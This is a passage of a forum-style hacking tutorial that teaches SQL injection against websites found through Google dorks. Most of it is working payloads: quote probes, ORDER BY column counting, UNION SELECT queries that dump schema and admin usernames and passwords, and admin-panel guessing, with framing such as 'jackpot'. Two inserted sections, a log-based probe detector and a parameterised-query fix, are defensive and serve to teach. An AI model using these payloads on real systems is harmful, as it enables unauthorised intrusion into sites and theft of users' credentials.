Hit enter.
You get a list of websites.
We have to visit the websites one by one to check for the vulnerability.
So start from the first website.

NOTE:

If you want to hack a particular website, then try this:
site:www.example.com dork_list_commands
For example:

site:www.example.com inurl:index.php?id=

-----------------------------------------------------------------------------

STEP 2:(Checking the Vulnerability)

Now we should check the vulnerability of the websites. To check, add a single quote (') at the end of the URL and hit enter. (No space between the number and the single quote.)

For example:
http://www.example.com/index.php?id=2'

If the page stays the same, shows "page not found" or shows some other webpage, then it is not vulnerable.

If it shows any error related to the SQL query, then it is vulnerable. Cheers!

For example:

(You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)

-----------------------------------------------------------------------------

STEP 3:(Finding Number of columns)

Now we have found that the website is vulnerable. The next step is to find the number of columns in the table.
For that, replace the single quote (') with an "order by n" statement (leave one space between the number and the order by statement).

Change n through 1, 2, 3, 4, 5, 6, ... until you get an error like "unknown column".

For example:

http://www.example.com/index.php?id=2 order by 1
http://www.example.com/index.php?id=2 order by 2
http://www.example.com/index.php?id=2 order by 3
http://www.example.com/index.php?id=2 order by 4

Change the number until you get the error "unknown column".

If you get the error while trying the xth number, then the number of columns is x-1.

I mean:

http://www.example.com/index.php?id=2 order by 1(noerror)
http://www.example.com/index.php?id=2 order by 2(noerror)
http://www.example.com/index.php?id=2 order by 3(noerror)
http://www.example.com/index.php?id=2 order by 4(noerror)
http://www.example.com/index.php?id=2 order by 5(noerror)
http://www.example.com/index.php?id=2 order by 6(noerror)
http://www.example.com/index.php?id=2 order by 7(noerror)
http://www.example.com/index.php?id=2 order by 8(error)

So now x=8; the number of columns is x-1, i.e. 7.

Sometimes the above may not work. In that case, add "--" at the end of the statement.

For eg:

http://www.example.com/index.php?id=2 order by 1--

-----------------------------------------------------------------------------

STEP 4: (Displaying the Vulnerable columns)

Using "union select columns_sequence" we can find the vulnerable part of the table. Replace the "order by n" with this statement, and change the id value to a negative number (I mean id=-2; it must be changed, but on some websites it may work without changing).

Replace columns_sequence with the numbers from 1 to x-1 (the number of columns) separated by commas (,).

For eg:
If the number of columns is 7, then the query is as follows:

http://www.example.com/index.php?id=-2 union select 1,2,3,4,5,6,7--

If the above method is not working then try this:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--

It will show some numbers on the page (each must be less than the 'x' value, I mean less than or equal to the number of columns).

Now select one number.
It shows 3 and 7. Let's take the number 3.
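Seen from the server side, the probing in steps 2 to 4 leaves a recognisable trail in the web server access log: a parameter ending in a stray quote, a run of "order by n" requests with increasing n, and then a "union select". The following is an added example (not part of the original post) that parses a few constructed Apache-style log lines, groups the probes per client, and escalates the verdict when the server answered a probe with a 5xx, which is exactly the SQL error the tutorial looks for. The log lines, client addresses and rule thresholds are all constructed for the example.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed Apache combined-format log lines (not real traffic). Client 203.0.113.5
# walks through steps 2-4 against index.php?id=; 198.51.100.7 sends one stray quote
# that the application answers normally.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Dec/2012:10:00:01 +0000] "GET /index.php?id=2 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Dec/2012:10:00:03 +0000] "GET /index.php?id=2' HTTP/1.1" 500 310
203.0.113.5 - - [04/Dec/2012:10:00:07 +0000] "GET /index.php?id=2%20order%20by%201 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Dec/2012:10:00:09 +0000] "GET /index.php?id=2%20order%20by%202 HTTP/1.1" 200 5120
203.0.113.5 - - [04/Dec/2012:10:00:11 +0000] "GET /index.php?id=2%20order%20by%208-- HTTP/1.1" 500 310
203.0.113.5 - - [04/Dec/2012:10:00:20 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,3,4,5,6,7-- HTTP/1.1" 200 5011
203.0.113.5 - - [04/Dec/2012:10:00:31 +0000] "GET /index.php?id=-2%20and%201=2%20union%20select%201,2,group_concat(table_name),4,5,6,7%20from%20information_schema.tables%20where%20table_schema=database()-- HTTP/1.1" 200 5300
198.51.100.7 - - [04/Dec/2012:10:01:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 4980
198.51.100.7 - - [04/Dec/2012:10:01:05 +0000] "GET /article.php?id=5' HTTP/1.1" 200 4980
"""

# Apache "combined" format without the referrer/user-agent tail.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Each rule is run against the URL-decoded, lower-cased request path. They mirror the
# probes in steps 2-4: the stray quote after a number, ORDER BY enumeration, the
# UNION SELECT that carries data out, and reads of version/schema metadata.
RULES = {
    "quote_probe":    re.compile(r"=\d+'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select":   re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_read":    re.compile(r"information_schema|@@version|\b(?:version|database|user)\(\)"),
}


def parse_line(line):
    """Parse one log line into a dict, or return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["decoded"] = unquote_plus(rec["url"]).lower()
    return rec


def classify(decoded_url):
    """Return the set of rule names that fire on one decoded request path."""
    return {name for name, rx in RULES.items() if rx.search(decoded_url)}


def analyse(log_text):
    """Aggregate per client: which probe kinds appeared, how often, and how many of those
    probes the server answered with a 5xx (an SQL error leaking through to the client)."""
    report = defaultdict(lambda: {"probes": Counter(), "errors_on_probe": 0, "verdict": "clean"})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec["decoded"])
        if not hits:
            continue
        entry = report[rec["ip"]]
        entry["probes"].update(hits)
        if rec["status"] >= 500:
            entry["errors_on_probe"] += 1
    for entry in report.values():
        p = entry["probes"]
        if p["union_select"] or p["schema_read"]:
            entry["verdict"] = "exploitation"   # data is being pulled out of the database
        elif p["order_by_probe"] >= 2 or (p["quote_probe"] and entry["errors_on_probe"]):
            entry["verdict"] = "recon"          # column counting, or a quote that produced an error
        else:
            entry["verdict"] = "suspicious"     # a lone probe the application handled cleanly
    return dict(report)


if __name__ == "__main__":
    for ip, entry in analyse(SAMPLE_LOG).items():
        print(ip, entry["verdict"], dict(entry["probes"]), "5xx on probe:", entry["errors_on_probe"])
```

The 5xx count matters more than the pattern count: a client whose quote probe is answered with a server error has just confirmed the page is injectable, which is the signal to fix the query before the "union select" follows a few seconds later.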

-----------------------------------------------------------------------------

STEP 5: (Finding version, database, user)
Now replace the 3 in the query with "version()".

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--

It will show the version as 5.0.1 or 4.3, something like this.

Replace version() with database() and user() to find the database and user respectively.

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working, then try this:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

-----------------------------------------------------------------------------

STEP 6: (Finding the Table Name)

If the version is 5 or above, then follow these steps. Now we have to find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()".

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Now it will show the list of table names. Find the table name which is related to admin or user.

Now select the "admin" table.

If the version is 4 or something else, you have to guess the table names (user, tbluser). It is hard and boring to do SQL injection with version 4.

-----------------------------------------------------------------------------

STEP 7: (Finding the Column Name)

Now replace "group_concat(table_name)" with "group_concat(column_name)".

Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--".

Now listen carefully: we have to convert the table name to a MySQL CHAR() string and replace mysqlchar with that.

Find MysqlChar() for the table name:
First of all, install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/
Now
select sql->Mysql->MysqlChar()

This will open a small window; enter the table name which you found. I am going to use the admin table name.

Click OK.

Now you can see CHAR(numbers separated with commas) in the HackBar toolbar.

Copy and paste the code at the end of the URL in place of "mysqlchar".

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

Now it will show the list of columns, like

admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

columnname should be replaced with one of the listed column names.
anothercolumnname should be replaced with another of the listed column names.

Now replace "from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with "from table_name".

For eg:

http://www.example.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

Sometimes it will show that the column is not found.
Then try other column names.

Now it will show usernames and passwords.

Enjoy..!! Cheers..!!

If the website has members then jackpot for you. You will have the list of usernames and passwords.
Sometimes you may have the email IDs also; enjoy, you got the duck which can produce the golden eggs.
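The extraction in steps 4 to 7 only works because the page's id parameter is concatenated straight into the SQL text. The following is an added example (not from the original post) that builds a small in-memory SQLite stand-in for the site's database and runs the step-2 quote probe and the step-7 payload through a function written the vulnerable way and through a hardened one that validates the type and binds the value as a parameter. SQLite is used so the example runs offline: its "||" concatenation replaces MySQL's multi-argument group_concat and 0x3a separator, and the table contents are constructed.

```python
import sqlite3

# Step-7 payload from the tutorial, rewritten in SQLite syntax: '||' replaces MySQL's
# multi-argument group_concat() and the 0x3a separator. Seven columns, as in the post.
UNION_PAYLOAD = ("-2 and 1=2 union select 1,2,"
                 "group_concat(admin_name || ':' || admin_password),4,5,6,7 from admin--")


def make_db():
    """Constructed in-memory stand-in for the site's MySQL database: a public 'articles'
    table served by index.php?id= (7 columns) and the 'admin' table the post goes after."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT,
                              tag TEXT, views INTEGER, posted TEXT);
        INSERT INTO articles VALUES
            (1, 'Hello', 'First post', 'editor', 'news', 10, '2012-12-01'),
            (2, 'BIOS passwords', 'How to reset one', 'editor', 'hardware', 25, '2012-12-04');
        CREATE TABLE admin(admin_id INTEGER, admin_name TEXT, admin_password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 's3cret-hash');
    """)
    return con


def fetch_article_vulnerable(con, raw_id):
    """The pattern the tutorial exploits: the request parameter is pasted into the SQL
    text, so a quote, ORDER BY or UNION SELECT all become part of the query."""
    sql = f"SELECT id,title,body,author,tag,views,posted FROM articles WHERE id={raw_id}"
    return con.execute(sql).fetchall()


def fetch_article_safe(con, raw_id):
    """Hardened form: reject anything that is not an integer, then bind the value as a
    parameter so the database engine never parses it as SQL."""
    try:
        article_id = int(raw_id)
    except (TypeError, ValueError):
        return []
    sql = "SELECT id,title,body,author,tag,views,posted FROM articles WHERE id=?"
    return con.execute(sql, (article_id,)).fetchall()


def demo():
    """Run the post's step-2 quote probe and step-7 UNION payload through both versions."""
    con = make_db()
    out = {}
    try:
        fetch_article_vulnerable(con, "2'")
        out["quote_probe_vulnerable"] = "no error"
    except sqlite3.OperationalError:
        out["quote_probe_vulnerable"] = "sql error"   # the signal step 2 looks for
    out["quote_probe_safe"] = fetch_article_safe(con, "2'")      # []
    out["union_vulnerable"] = fetch_article_vulnerable(con, UNION_PAYLOAD)
    out["union_safe"] = fetch_article_safe(con, UNION_PAYLOAD)   # []
    out["normal_safe"] = fetch_article_safe(con, "2")
    return out


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The vulnerable function returns the admin credentials in column 3, which is the "vulnerable column" the tutorial picks in step 4; the hardened one returns nothing for the same input and still serves article 2 normally. Parameter binding alone would already stop the payload, since the whole string would be compared against the id column as one value; the int() check on top of it keeps the malformed request out of the database and the error log entirely.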

-----------------------------------------------------------------------------

STEP 8: (Finding the Admin Panel)

Just try URLs like:

http://www.example.com/admin.php
http://www.example.com/admin/
http://www.example.com/admin.html
http://www.example.com:2082/
etc.

If you are lucky, you will find the admin page using the above URLs, or try this list.
Here is the list of admin URLs:

http://www.ziddu.com/download/13163866/A...t.zip.html

and finally LOG IN



---------THE END---------